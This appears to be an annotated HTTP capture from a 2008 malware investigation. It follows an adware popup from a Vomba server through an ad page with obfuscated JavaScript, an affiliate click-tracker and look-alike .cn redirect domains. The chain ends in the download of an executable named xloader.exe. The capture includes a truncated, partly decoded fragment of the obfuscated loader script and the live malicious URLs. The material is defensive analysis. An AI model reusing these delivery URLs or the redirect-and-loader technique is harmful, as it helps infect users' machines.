POST /vomba/popup.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Vomba
Host: services.vombanetwork.com
Content-Length: 366
Cache-Control: no-cache
Cookie: __utma=...

hwd=...&ac=202&sac=1000&ver=1020001&pop=8&time=...&his=uid:...|--&keyword=www.gevalia.com|image|home|gevalia.com|gevalia%20com|gevalia|&trigger_domain=www.gevalia.com&trigger_url=%2FGevalia%2Fimages%2Fcommon%2Fdot_clear.gif%3F%26mid%3Db4fZXZnQ%26ptid%3DHOME

HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NON NID PSAa PSDa OUR IND NAV"
Set-Cookie: ...
Content-Length: 1303
Content-Type: text/html; charset=UTF-8

1 1 1 1 0 1 0 1 550 750 0 0 http%3A%2F%2Fwww.doubleyourctr.com%2Fgevalia.htm 0 ... ... iadv10178 http://mediatraffic.com ... Mon, 10-Nov-2008 5:32:50 GMT 0 3 -1 -1 -1 -1 NORS

GET /gevalia.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.doubleyourctr.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:50 GMT
Server: Apache
Last-Modified: Sun, 21 Sep 2008 16:21:44 GMT
ETag: "3dc208-4ed9-48d67498"
Accept-Ranges: bytes
Content-Length: 20185
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Please wait..

GET /afclick.php?o=3882&b=x2mhm0x0&p=9136&l=1&s=tm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.lynxtrack.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 11 Oct 2008 06:32:56 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOR DSP COR ADM OUR"
Set-Cookie: afclick_3882=1223706776%2B3882%2B9136%2Btm%2Bx2mhm0x0%2B9f2b09a0-e8ae-102b-9f5a-001372fd42f8%2B1%2B0; expires=Sat, 11-Oct-2008 08:32:56 GMT; path=/; domain=.lynxtrack.com
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

If this page does not load please click here. -->

Decoding and partially reformatting a portion of the encoded JavaScript found above:

function zhjI(fuJ){
  function wXul(eIfHsa){
    var tmDC=0;
    var ilpI=eIfHsa.length;
    var iHUzIn=0;
    while(iHUzIn
ggx.length)yhqI=0;
if(zifvHGv>zsQzva.length)zifv% ...

GET /bizhost.cn/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.doubleyourctr.com/gevalia.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.doubleyourctr.com.2d6a235d6093b2a6.axa3.cn
Connection: Keep-Alive

HTTP/1.1 302 Found
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Location: http://www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn/myspace.cn/index.php
Content-Length: 0

GET /myspace.cn/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.doubleyourctr.com/gevalia.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive
Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Content-Length: 1155

GET /myspace.cn/load.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sat, 11 Oct 2008 14:26:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Accept-Ranges: bytes
Content-Length: 13312
Content-Disposition: inline; filename=xloader.exe

MZ..................@.......................................... !.L!This program cannot be run in DOS mode. ...